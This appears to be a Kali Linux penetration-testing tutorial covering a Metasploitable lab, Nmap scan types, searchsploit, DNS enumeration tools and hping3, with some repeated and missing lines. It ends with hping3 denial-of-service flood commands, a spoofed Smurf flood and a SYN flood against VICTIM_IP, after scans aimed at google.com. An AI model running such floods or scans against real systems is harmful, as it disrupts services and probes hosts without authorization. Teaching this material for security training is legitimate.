Laboratory Setup: Step 1: Download Metasploitable, Which Is A Linux Machine. It Can Be Downloaded From
Laboratory Setup: Step 1: Download Metasploitable, Which Is A Linux Machine. It Can Be Downloaded From
Laboratory Setup: Step 1: Download Metasploitable, Which Is A Linux Machine. It Can Be Downloaded From
Rosetta, 2021
Laboratory Setup
In this section, we will set up another testing machine to perform the tests with the help
of tools of Kali Linux.
Step 2: Register by supplying your details. After filling the above form, we can
download the software.
Step 4: Click “Use an existing virtual hard disk file”. Browse the file where you have
downloaded Metasploitable and click Open.
Output
Nmap provides four possible output formats. All but the interactive output is saved to a file. Nmap output can be
manipulated by text processing software, enabling the user to create customized reports.
Interactive: Presented and updated real time when a user runs Nmap from the command line. Various
options can be entered during the scan to facilitate monitoring.
XML: A format that can be further processed by XML tools. It can be converted into a HTML report
using XSLT.
Grepable: Output that is tailored to line-oriented processing tools such as grep, sed or awk.
Normal: The output as seen while running Nmap from the command line, but saved to a file.
Script kiddie: Meant to be an amusing way to format the interactive output replacing letters with their
visually alike number representations. For example, Interesting ports becomes Int3rest1ng p0rtz.
Stealth Scan
Stealth scan or SYN is also known as half-open scan, as it doesn’t complete the TCP three-way handshake. A
hacker sends a SYN packet to the target; if a SYN/ACK frame is received back, then it’s assumed the target
would complete the connect and the port is listening. If an RST is received back from the target, then it is
assumed the port isn’t active or is closed.
Now to see the SYN scan in practice, use the parameter –sS in NMAP. Following is the full command –
Following table contains detail of Flag, Data length and TTL in different scanning method:
← SYN, ACK
-sT (TCP) 60 64
ACK →
RST, ACK →
SYN →
RST
-sF (Finish) FIN → 40 <64 (Less than 64)
-sN (Null) NULL → 40 <64 (Less than 64)
-sX (Xmas) FIN, PSH, URG → 40 <64 (Less than 64)
Searchsploit
Searchsploit is a tool that helps Kali Linux users to directly search with the command line from Exploit database
archive.
To open it, go to Applications -> 08-Exploitation Tools -> searchsploit, as shown in the following screenshot.
Introduction to SearchSploit
Included in the Exploit Database repository on GitHub is ―searchsploit‖, a command line search tool for
Exploit-DB that also allows you to take a copy of Exploit Database with you, everywhere you go. SearchSploit
gives you the power to perform detailed offline searches through your locally checked-out copy of the
repository. This capability is particularly useful for security assessments on segregated or air-gapped networks
without Internet access.
Since we are using GNOME build of Kali Linux, therefore, the ―exploitdb‖ package is already included by
default, all we need to do, open the terminal and just type ―searchsploit‖ and press Enter. You will welcome by
its help screen.
Kali Linux
If you are using the standard GNOME build of Kali Linux, the exploitdb package is already included by default!
However, if you are using the Kali Light variant or your own custom-built ISO, you can install the package
manually as follows:
# apt update && apt -y install exploitdb
You may wish to install some other related packages: exploitdb-papers and exploitdb-bin-sploits.
# apt -y install exploitdb-bin-sploits exploitdb-papers
Updating SearchSploit
Regardless of how you installed SearchSploit, all you need to do in order to update it is run the following:
# searchsploit -u
If you are using the Kali Linux package and haven’t updated since before 20 September 2016 (shame on you),
you will first need to update the package in the traditional manner:
# apt update && apt -y full-upgrade
Help Screen
By using -h, you can see all the features and options that are available to you:
# searchsploit –h
Basic Search
Simply add any number of search terms you wish to look for:
# searchsploit afd windows local
Title Searching
By default, searchsploit will check BOTH the title of the exploit as well as the path. Depending on the search
criteria, this may bring up false positives (especially when searching for terms that match platforms and version
numbers). Searches can be restricted to the titles by using the -t option:
# searchsploit -t oracle
# searchsploit -t oracle windows
Removing Unwanted Results
We can remove unwanted results by using the --exclude option. We are also able to remove multiple terms by
separating the value with a | (pipe). This can be demonstrated by the following:
# searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
Piping Output (Alternative Method of Removing Unwanted Results)
The output from searchsploit can be piped into any other program, which is especially useful when outputting
the results in JSON format (using the -j option). With this, it is possible to remove any unwanted exploits by
using grep. In the following example, we use grep to filter out any "Denial of Service (DoS)" results.
# searchsploit XnView | grep -v '/dos/'
Colour Output
By default, searchsploit highlights the search terms in the results when they are displayed to the user. This
works by inserting invisible characters into the output before and after the colour changes.
Now, if you were to pipe the output (for example, into grep) and try to match a phrase of both highlighted and
non-highlighted text in the output, it would not be successful. This can be solved by using the --colour option (--
color works as well).
# searchsploit wordpress mail list
Copy To Clipboard
So now that we have found the exploit we are looking for, there are various ways to access it quickly.
By using -p, we are able to get some more information about the exploit, as well as copy the complete path to
the exploit onto the clipboard:
# searchsploit 39446
# searchsploit -p 39446
Copy To Folder
We recommend that you do not alter the exploits in your local copy of the database. Instead, make a copy of
ones that are of interest and use them from a working directory. By using the -m option, we are able to select as
many exploits we like to be copied into the same folder that we are currently in:
# searchsploit MS14-040
# searchsploit -m MS14-040
Examine an Exploit
Using —examine option, enables examine parameter to read the functionality of that exploit with the help of
$PAGER.
# searchsploit 39166 --examine
Examining Nmap result
Using –x option enables the examine parameter as well as –nmap option Checks all results in Nmap XML
output with service version to find out related exploit with it.
# searchsploit –x --nmap result.xml
Case Sensitive
Using –c option enables the ―case-sensitive search‖ parameter to find out exploit related to specific character
mention in the command, by default it makes the insensitive search. You can consider the following example:
# searchsploit xss
# searchsploit –c XSS
Exploit-DB Online
The Exploit Database repository is the main core of Exploit-DB, making SearchSploit efficient and easy to use.
However, some of the exploit metadata (such as screenshots, setup files, tags, and vulnerability mappings) are
not included. To access them, you will need to check the website.
You can quickly generate the links to exploits of interest by using the -w option:
# searchsploit WarFTP 1.65 -w
DNS Tools
we will learn how to use some DNS tools that Kali has incorporated. Basically, these tools help in zone transfers
or domain IP resolving issues.
dnsenum.pl
The first tool is dnsenum.pl which is a PERL script that helps to get MX, A, and other records connect to a
domain
Open the Terminal and Type ―dnsenum domain name‖ and all the records will be shown. In this case, it shows
A records.
# dnsenum –enum google.com
Enumeration of Subdomain
When we run this command, it with perform brute force search on subdomains along with the custom file passed
as an attribute.
# vi subdomain.txt
# mail
# www
# webmail
# service
# web
Save and exit.
# dnsenum –f subdomain.txt –r google.com
DNSMAP
The second tool is DNSMAP which helps to find the phone numbers, contacts, and other subdomain connected
to this domain, that we are searching. Following is an example.
Click the terminal as in the upper section , then write ―dnsmap domain name‖
# dnsmap google.com
For saving the output for later use in pentesting, rather than just viewing the results on the linux console. For
saving the output in .txt file, type
# dnsmap google.com -r /root/Desktop/dnsmapoutput.txt
Downloads wordlist from the given link and use it with -w option, as mentioned below:
http://www.md5this.com/tools/wordlists.html
Dnsmap command with wordlist:
# dnsmap target-domain.foo -w yourwordlist.txt -r /tmp/domainbf_results.txt
dnstracer
The third tool is dnstracer, which determines where a given Domain Name Server (DNS) gets its information
from for a given hostname.
Click the terminal as in the upper section, then type ―dnstracer domain name‖.
# dnstracer google.com
Dnstracer is a Domain Name Server Information gathering tool, which extract unique DNS information about a
domain. It extracts different types of DNS records like NS, MX, A, AAAA, SOA, NSEC etc.
DNS query for the A records.
# dnstracer -v -o google.com
-v verbose mode, to show requests and answers going back and forth.
-a shows the summary of domain scan.
-o enable overview of received answers
The above query shows the DNS headers and header fields.
DNS query for the SOA records.
# dnstracer -q soa -o -4 google.com
-q means DNS record type (here DNS record type is SOA)
-o print the summary on the console
-4 means ignore IPv6
DNS query for the NS(Name Server) records.
# dnstracer -q ns -o -4 google.com
DNS query for the MX(Mail Exchange) records.
# dnstracer -q mx -o -4 google.com
LBD Tools
lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP Load-Balancing (via Server: and
Date: header and diffs between server answers).
DNS load balancing
In DNS load balancing, a system has a list of IPs that can respond to requests. When you request a resource, you
hit on one of these IPs, and you need to test further to identify the exact target. If your target is example.com,
and 3 IPs are serving that, when you find a vulnerability, you still have to determine which of these addresses is
the vulnerable one (or if all are).
HTTP load balancing
One of the ways HTTP load balancing can be achieved is through cookies. This comes in handy in online stores
and other such web applications that need to identify a client and send it to the same specific resource.
DNS and HTTP load balancing
# lbd google.com
Hping3
Hping3 is widely used by ethical hackers. It is nearly similar to ping tools but is more advanced, as it can bypass
the firewall filter and use TCP, UDP, ICMP and RAW-IP protocols. It has a traceroute mode and the ability to
send files between a covered channel.
While hping was mainly used as a security tool in the past, it can be used in many ways by people that don’t
care about security to test networks and hosts. A subset of the stuff you can do using hping:
Firewall testing
Advanced port scanning
Network testing, using different protocols, TOS, fragmentation
Manual path MTU discovery
Advanced traceroute, under all the supported protocols
Remote OS fingerprinting
Remote uptime guessing
TCP/IP stacks auditing
hping can also be useful to students that are learning TCP/IP.
1. Testing ICMP: In this example hping3 will behave like a normal ping utility, sending ICMP-echo und
receiving ICMP-reply
# hping3 -1 google.com
2. Traceroute using ICMP: This example is similar to famous utilities like tracert (windows) or traceroute
(linux) who uses ICMP packets increasing every time in 1 its TTL value.
# hping3 --traceroute -V -1 google.com
3. Checking port: Here hping3 will send a Syn packet to a specified port (80 in our example). We can control
also from which local port will start the scan (5050).
# hping3 -V -S -p 80 -s 5050 google.com
4. Traceroute to a determined port: A nice feature from Hping3 is that you can do a traceroute to a specified port
watching where your packet is blocked. It can just be done by adding --traceroute to the last command.
# hping3 --traceroute -V -S -p 80 -s 5050 google.com
5. Other types of ICMP: This example sends a ICMP address mask request ( Type 17 ).
# hping3 -c 1 -V -1 -C 17 google.com
6. Other types of Port Scanning: First type we will try is the FIN scan. In a TCP connection the FIN flag is used
to start the connection closing routine. If we do not receive a reply, that means the port is open. Normally
firewalls send a RST+ACK packet back to signal that the port is closed..
# hping3 -c 1 -V -p 80 -s 5050 -F google.com
7. Ack Scan: This scan can be used to see if a host is alive (when Ping is blocked for example). This should send
a RST response back if the port is open.
# hping3 -c 1 -V -p 80 -s 5050 -A google.com
8. Xmas Scan: This scan sets the sequence number to zero and set the URG + PSH + FIN flags in the packet. If
the target device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's
TCP port is open, the target discards the TCP Xmas scan, sending no reply.
# hping3 -c 1 -V -p 80 -s 5050 -M 0 -UPF google.com
9. Null Scan: This scan sets the sequence number to zero and have no flags set in the packet. If the target
device's TCP port is closed, the target device sends a TCP RST packet in reply. If the target device's TCP port is
open, the target discards the TCP NULL scan, sending no reply.
# hping3 -c 1 -V -p 80 -s 5050 -Y google.com
10. Smurf Attack: This is a type of denial-of-service attack that floods a target system via spoofed broadcast
ping messages.
# hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS
11. DOS Land Attack:
# hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source VICTIM_IP
--flood: sent packets as fast as possible. Don't show replies.
--rand-dest: random destionation address mode. see the man.
-V <-- Verbose
-c --count: packet count
-d --data: data size
-S --syn: set SYN flag
-w --win: winsize (default 64)
-p --destport [+][+]<port> destination port(default 0) ctrl+z inc/dec
-s --baseport: base source port (default random)